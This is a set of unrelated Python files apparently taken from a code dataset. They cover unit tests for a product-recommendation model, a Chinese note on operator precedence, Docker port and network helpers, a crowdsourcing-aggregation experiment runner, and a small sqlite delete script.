        recommendation = Recommendation(product_id=1, recommendation_product_id=2, relationship=Type.UP_SELL)
        data = recommendation.serialize()
        self.assertNotEqual(data, None)
        self.assertIn("product_id", data)
        self.assertEqual(data["product_id"], recommendation.product_id)
        self.assertIn("recommendation_product_id", data)
        self.assertEqual(data["recommendation_product_id"], recommendation.recommendation_product_id)
        self.assertIn("relationship", data)
        self.assertEqual(data["relationship"], recommendation.relationship.name)

    def test_deserialize_a_recommendation(self):
        """ Test deserialization of a Recommendation """
        data = {
            "product_id": 1,
            "recommendation_product_id": 2,
            "relationship": Type.UP_SELL
        }
        recommendation = Recommendation()
        recommendation.deserialize(data)
        self.assertNotEqual(recommendation, None)
        self.assertEqual(recommendation.product_id, 1)
        self.assertEqual(recommendation.recommendation_product_id, 2)
        self.assertEqual(recommendation.relationship, Type.UP_SELL)

    def test_deserialize_missing_data(self):
        """ Test deserialization of a Recommendation with missing data """
        data = {"product_id": 1}
        recommendation = Recommendation()
        self.assertRaises(DataValidationError, recommendation.deserialize, data)

    def test_deserialize_bad_data(self):
        """ Test deserialization of bad data """
        data = "this is not a dictionary"
        recommendation = Recommendation()
        self.assertRaises(DataValidationError, recommendation.deserialize, data)

    def test_list_recommendation(self):
        """Test list recommendations"""
        recommendations = RecommendationFactory.create_batch(1)
        for recommendation in recommendations:
            recommendation.create()
        logging.debug(recommendations)
        # CONSISTENCY FIX: call all() on the model class (as every other
        # test does), not on an instance left over from the loop.
        self.assertEqual(len(Recommendation.all()), 1)

    def test_find_recommendation_type(self):
        """Find a recommendation type by two product ids"""
        recommendations = RecommendationFactory.create_batch(1)
        for recommendation in recommendations:
            recommendation.create()
        logging.debug(recommendations)
        # find the recommendation in the list
        recommendation = Recommendation.find(recommendations[0].product_id, recommendations[0].recommendation_product_id)
        self.assertIsNot(recommendation, None)
        self.assertEqual(recommendation.product_id, recommendations[0].product_id)
        self.assertEqual(recommendation.recommendation_product_id, recommendations[0].recommendation_product_id)
        self.assertEqual(recommendation.relationship, recommendations[0].relationship)

    def test_update_a_recommendation(self):
        """Update a recommendation type by two product ids"""
        recommendation = RecommendationFactory()
        logging.debug(recommendation)
        recommendation.create()
        logging.debug(recommendation)
        logging.debug(type(recommendation.relationship.name))
        recommendation.relationship = Type.CROSS_SELL
        recommendation.update()
        self.assertIsNot(recommendation, None)
        self.assertEqual(recommendation.relationship.name, 'CROSS_SELL')
        recommendations = recommendation.all()
        self.assertEqual(len(recommendations), 1)
        self.assertEqual(recommendations[0].product_id, recommendation.product_id)
        self.assertEqual(recommendations[0].recommendation_product_id, recommendation.recommendation_product_id)
        self.assertEqual(recommendations[0].relationship, recommendation.relationship)

    def test_update_a_recommendation_no_relationship(self):
        """Update a recommendation type by two product ids without relationship"""
        recommendation = RecommendationFactory()
        logging.debug(recommendation)
        recommendation.create()
        logging.debug(recommendation)
        recommendation.relationship = None
        self.assertRaises(DataValidationError, recommendation.update)

    def test_find_recommendation_by_id_and_type(self):
        """Find a recommendation type by product id and relationship id"""
        query_id = 1
        query_type = Type.UP_SELL
        recommendations = [Recommendation(product_id=query_id, recommendation_product_id=2, relationship=query_type),
                           Recommendation(product_id=query_id, recommendation_product_id=10, relationship=query_type),
                           Recommendation(product_id=query_id, recommendation_product_id=15, relationship=Type.ACCESSORY)]
        for recommendation in recommendations:
            recommendation.create()
        logging.debug(recommendations)
        # every returned row must match both the id and the relationship type
        results = Recommendation.find_by_id_and_type(query_id, Type.UP_SELL)
        for recommendation in results:
            self.assertIsNot(recommendation, None)
            self.assertEqual(recommendation.product_id, query_id)
            self.assertEqual(recommendation.relationship, query_type)

    def test_update_a_recommendation_likes(self):
        """Like a recommendation"""
        recommendation = RecommendationFactory()
        recommendation.create()
        self.assertEqual(recommendation.likes, 0)
        recommendation.likes += 1
        recommendation.update()
        self.assertEqual(recommendation.likes, 1)

    def test_clear_data(self):
        '''Clear all data entries'''
        recommendations = RecommendationFactory.create_batch(1)
        for recommendation in recommendations:
            recommendation.create()
        self.assertEqual(len(Recommendation.all()), 1)
        Recommendation.clear()
        self.assertEqual(len(Recommendation.all()), 0)
|
991,695 | c1cb1a8d764cff27cf807edb91dbe3bbd2d2c376 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/6/21 23:47
# @Author : SNCKnight
# @File : 08_operator_precedence.py
# @Software: PyCharm
"""运算符优先级
一般用()控制运算优先级
** 指数 (最高优先级)
~ + - 按位翻转, 一元加号和减号 (最后两个的方法名为 +@ 和 -@)
* / % // 乘,除,取模和取整除
+ - 加法减法
>> << 右移,左移运算符
& 位 'AND'
^ | 位运算符
<= < > >= 比较运算符
<> == != 等于运算符
= %= /= //= -= += *= **= 赋值运算符
is is not 身份运算符
in not in 成员运算符
and or not 逻辑运算符
"""
|
991,696 | 266f25c98379fe914fd1d928316bfd4afa129878 | """
Copyright 2021 Adobe
All Rights Reserved.
NOTICE: Adobe permits you to use, modify, and distribute this file in accordance
with the terms of the Adobe license agreement accompanying it.
"""
import contextlib
import re
import socket
import subprocess
import time
import requests
import yaml
from . import config, log
def check_docker_network():
    """Ensure the configured docker network exists, creating it when absent."""
    logger = log.get_logger()
    logger.debug(f'Checking for docker network {config.get_dc_network()}')
    # `docker network inspect` exits non-zero when the network does not exist.
    missing = subprocess.call(
        ['docker', 'network', 'inspect', config.get_dc_network()],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    if not missing:
        return
    logger.info(f'Creating docker network {config.get_dc_network()}')
    subprocess.check_call(
        ['docker', 'network', 'create', config.get_dc_network()],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
def get_open_ports(container_name):
    """
    Retrieves the open ports on a container.
    :param container_name:
    :return: The open ports as a dictionary of container ports to host ports
    """
    try:
        lines = subprocess.check_output(['docker', 'port', container_name]).splitlines()
        ports = {}
        for line in lines:
            # Dots are escaped so arbitrary characters cannot match where the
            # literal address 0.0.0.0 is expected.
            match = re.match(r'^(\d+)/tcp -> 0\.0\.0\.0:(\d+)$', line.strip().decode('utf-8'))
            if not match:
                continue
            ports[int(match.group(1))] = int(match.group(2))
        return ports
    except subprocess.CalledProcessError:
        log.get_logger().warning(
            f'Could not find open ports for {container_name}, please ensure it is configured correctly'
        )
        # Return an empty dict (the original returned []) so the failure value
        # matches the documented dict return type and supports .items()/lookups.
        return {}
def is_port_open(port):
    """
    Checks if the port is open on localhost by creating a socket connection to it.
    :param port: The port as a number
    :return: True if open, false otherwise
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect_ex returns 0 on success instead of raising.
        return probe.connect_ex(('127.0.0.1', port)) == 0
    finally:
        probe.close()
def _is_path_responding(port: int, path: str) -> bool:
    """Return True iff GET http://localhost:<port><path> answers with HTTP 200.

    Any exception from the request (e.g. connection refused while the
    container is still starting) counts as "not responding".
    """
    with contextlib.suppress(Exception):
        return requests.get(f'http://localhost:{port}{path}').status_code == 200
    # The request raised and was suppressed: honour the -> bool contract
    # explicitly instead of implicitly returning None.
    return False
def check_port(container_name: str, port: int, path: str) -> None:
    """Block until the container's HTTP endpoint responds, polling every 0.1s.

    Logs at INFO roughly every 3 seconds and at DEBUG for the polls in between.
    """
    attempts = 0
    while not _is_path_responding(port, path):
        message = f'Container {container_name} is not yet up, sleeping...'
        # Count iterations instead of accumulating 0.1-second floats: repeated
        # binary-float addition of 0.1 never lands exactly on a multiple of 3,
        # so the original `total_time % 3 == 0` check (with total_time starting
        # at 0.1) essentially never logged at INFO level.
        if attempts % 30 == 0:
            log.get_logger().info(message)
        else:
            log.get_logger().debug(message)
        attempts += 1
        time.sleep(0.1)
def read_services_from_dc(docker_compose_path: str):
    """Return the service names declared in a docker-compose YAML file."""
    with open(docker_compose_path, encoding='utf8') as fobj:
        compose = yaml.safe_load(fobj)
    # Missing 'services' section yields an empty view rather than an error.
    return compose.get('services', {}).keys()
|
991,697 | b3af7f087e2c15d0eb147ea759e14abe5bf8415d | import sys, os
# Absolute path of the repository root (two levels above this file), prepended
# to sys.path so sibling packages (pipelines, launchers) import without install.
ROOT_FOLDER = os.path.dirname(
    os.path.dirname(
        os.path.abspath(__file__)))
sys.path.insert(0, ROOT_FOLDER)
from pipelines import data_curation
from launchers import data_update_launcher
def main():
    """Entry point: run the data update launcher, then the curation pipeline."""
    data_update_launcher.main()
    print("Running data curation pipeline")
    data_curation.main()


if __name__ == '__main__':
    main()
|
991,698 | 69655a4ab2aec09b6d12726053d358c397891b8f | '''
Created on April 27, 2018
@author: Edwin Simpson
'''
import os
import evaluation.experiment
from evaluation.experiment import Experiment
import data.load_data as load_data
import numpy as np
regen_data = False

# Load the PICO biomedical crowdsourcing dataset. Pass debug_subset_size=1000
# to load_biomedical_data to debug with a small sample.
gt, annos, doc_start, features, gt_val, _, _, _ = load_data.load_biomedical_data(regen_data)


def _run_experiment(methods, beta0_factor, alpha0_diags, alpha0_factor,
                    begin_factor=None, output_name=None):
    """Run one batch of annotation-aggregation methods on the PICO data.

    This replaces eleven copy-pasted Experiment setup/run sections; each call
    reproduces one of the original sections exactly (same output directory,
    hyperparameters, methods and ordering).

    :param methods: list of method names to pass to Experiment.methods
    :param beta0_factor: transition prior strength (only some methods use it)
    :param alpha0_diags: annotator-confusion prior, diagonal strength
    :param alpha0_factor: annotator-confusion prior, overall strength
    :param begin_factor: optional begin-label prior boost (bsc_seq variants)
    :param output_name: output subdirectory; defaults to the original
        'pico3_%f_%f_%f' naming scheme built from the hyperparameters
    """
    if output_name is None:
        output_name = 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags, alpha0_factor)
    output_dir = os.path.join(evaluation.experiment.output_root_dir, output_name)

    # Only pass begin_factor when set, to keep the Experiment constructor
    # calls identical to the originals that omitted it.
    kwargs = {}
    if begin_factor is not None:
        kwargs['begin_factor'] = begin_factor

    exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val,
                     doc_start, features, alpha0_factor=alpha0_factor,
                     alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
                     max_iter=20, **kwargs)
    exp.methods = methods
    # Task 1 -- train on all crowdsourced data, test on the labelled portion thereof.
    exp.run_methods(new_data=regen_data)


# Baselines that don't require tuning; only HMM_crowd uses the hyperparameters.
_run_experiment(['best', 'worst', 'majority', 'ds', 'mace', 'HMM_crowd'],
                0.1, 0.1, 0.1, output_name='pico3')
_run_experiment(['ibcc'], 0.1, 10, 1)
_run_experiment(['bsc_acc_integrateIF'], 0.1, 0.1, 0.1)
_run_experiment(['bsc_spam_integrateIF'], 0.1, 10, 1)
_run_experiment(['bsc_cv_integrateIF'], 0.1, 1.0, 0.1)
_run_experiment(['bsc_cm_integrateIF'], 0.1, 1.0, 10.0)
_run_experiment(['bsc_seq_integrateIF'], 1, 10, 10, begin_factor=10)
_run_experiment(['bsc_seq'], 1, 1, 1, begin_factor=10)  # no word features
_run_experiment(['bsc_seq_integrateIF_noHMM'], 1, 10, 0.1, begin_factor=10)
_run_experiment(['bsc_cm'], 1, 10, 10)  # no word features
_run_experiment(['bsc_cm_integrateIF_noHMM'], 0.1, 10, 0.1)
# # ------------------------------------------------------------------------------------------------
# # tune with small dataset to save time
# s = 300
# idxs = np.argwhere(gt_val != -1)[:, 0] # for tuning
# ndocs = np.sum(doc_start[idxs])
#
# if ndocs > s:
# idxs = idxs[:np.argwhere(np.cumsum(doc_start[idxs]) == s)[0][0]]
# elif ndocs < s: # not enough validation data
# moreidxs = np.argwhere(gt != -1)[:, 0]
# deficit = s - ndocs
# ndocs = np.sum(doc_start[moreidxs])
# if ndocs > deficit:
# moreidxs = moreidxs[:np.argwhere(np.cumsum(doc_start[moreidxs]) == deficit)[0][0]]
# idxs = np.concatenate((idxs, moreidxs))
#
# tune_annos = annos[idxs]
# tune_doc_start = doc_start[idxs]
# tune_text = features[idxs]
# gt_val = gt_val[idxs]
#
# beta_factors = [0.1, 1]
# diags = [0.1, 1, 10]
# factors = [0.1, 1, 10]
#
# methods_to_tune = [
# # 'ibcc',
# # 'bsc_acc_integrateIF',
# # 'bsc_mace_integrateIF',
# # 'bsc_vec_integrateIF',
# # 'bsc_ibcc_integrateIF',
# ]
# output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico')
# exp = Experiment(output_dir, 3, annos, gt, doc_start, features, tune_annos, gt_val, tune_doc_start, tune_text,
# max_iter=20, begin_factor=10)
#
# for m, method in enumerate(methods_to_tune):
# print('TUNING %s' % method)
#
# best_scores = exp.tune_alpha0(diags, factors, beta_factors, method, metric_idx_to_optimise=11)
# best_idxs = best_scores[1:].astype(int)
#
# exp.beta0_factor = beta_factors[best_idxs[0]]
# exp.alpha0_diags = diags[best_idxs[1]]
# exp.alpha0_factor = factors[best_idxs[2]]
#
# print('Best values: %f, %f, %f' % (exp.beta0_factor, exp.alpha0_diags, exp.alpha0_factor))
#
# # this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
# exp.methods = [method]
# exp.run_methods(new_data=regen_data)
|
991,699 | c671d01e0b7cee73fba1f757e891cb7440b6e3bd | import sqlite3
# Module-level connection and cursor shared by DELETE below; this is a
# one-shot utility script, so the connection is opened once at import time
# and closed inside DELETE.
connection = sqlite3.connect('databaseContratos.db')
c = connection.cursor()
def DELETE(codigo):
    """Delete the CONTRATO row(s) matching codigo, print what remains,
    then commit and close the shared connection (single-use script).

    Uses a named-parameter query, so codigo is passed safely to sqlite.
    """
    c.execute("DELETE FROM CONTRATO WHERE codigo=:codigo", {'codigo': codigo})
    c.execute("SELECT * FROM CONTRATO")
    remaining = c.fetchall()
    print(remaining)
    connection.commit()
    connection.close()


codigo = "a"
DELETE(codigo)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.